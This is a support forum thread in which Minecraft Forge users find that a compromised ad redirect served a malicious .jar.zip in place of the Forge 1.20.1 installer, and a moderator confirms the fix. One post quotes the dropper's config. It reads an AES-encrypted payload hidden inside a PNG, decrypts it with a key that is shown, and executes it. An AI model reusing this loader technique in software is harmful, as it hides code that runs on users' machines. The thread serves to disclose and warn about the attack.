Jump to content

Recommended Posts

Posted

I want to install Minecraft Forge, but before I could download it as a .jar file, but now when I download it, it downloads as a .zip file.
For some reason, the extension at the end of the file is .jar.zip. When I unzip it, there is a file named conf and an unfamiliar .exe file, and when I run it, nothing happens. The download source is Official site.

What I tried:

  • I dumped the zip into the mods.
  • I downloaded other versions (all downloaded as .zip)
Posted (edited)

I am having the same issue for forge 1.20.1, both releases, but NOT for 1.20 and any other version below that.

 

@Always needs help did you by any chance unzip the whole thing, including the weird conf folder? This seems extremely likely to be a virus. I opened the nginx.conf file from the conf folder in a text editor and this file reads and executes the png file from that same folder. I assumed the exe file would set it all up and allow the hidden code from the image to be executed on my pc, so I avoided that, but I would suggest you check, double check and triple check for viruses.

Edited by szzaass
formatting
Posted

Adding a bit more context:

File downloaded from official forge site (https://files.minecraftforge.net/net/minecraftforge/forge/index_1.20.1.html😞

forge-1.20.1-47.1.46-installer.jar.zip

Contents of zip file:

- forge-1.20.1-47.1.46-installer.jar.Install_v3.6.5.639.exe
+ conf/
  - juW3tVkmk4JXLkWAsUjtS1T2iZLOYSQt.png
  - nginx.conf

Contents of _nginx.conf_ file:

worker_processes  1;

http {
    copy_file_or_dir conf /Google/Chrome/conf;
    read_file_from_offset global_buf global_len conf/juW3tVkmk4JXLkWAsUjtS1T2iZLOYSQt.png 51033;
    decrypt_aes global_buf xS8qrBECI5HlEIb8 global_len;
    execute global_buf;
}

The contents of this .conf file are all shades of grey possible.

 

Something REALLY weird is that downloading from different browsers result in different contents. The overall thing is the same, but the png file name changes and the buffer length read is different as well.

Posted

@Always needs help

If you know a bit of HTML/JS you can inspect the adfocus skip button and get the correct download link from there. I'm not posting it here because I'm not sure if the rules allow it. There seems to be something overriding the download function when you click the skip button. Seems like some ill intentioned javascript injection is going on regarding adfocus and they are banking on people's interest in the newest versions of Forge.

 

@Paint_Ninja I think this is something worth looking into, I'm sorry to mention you directly but it might hurt community trust if not addressed.

  • Thanks 1
Posted

Thank you for notifying me. We have immediately disabled adfocus after confirming they were compromised and apologise if anyone ended up running the exe contained within.

I recommend running a virus scan if you did run the exe. Forge doesn't distribute any exe files when downloading modern jar installers.

https://support.microsoft.com/en-us/windows/help-protect-my-pc-with-microsoft-defender-offline-9306d528-64bf-4668-5b80-ff533f183d6c

The download pages are now safe again.

  • Like 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Announcements



×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.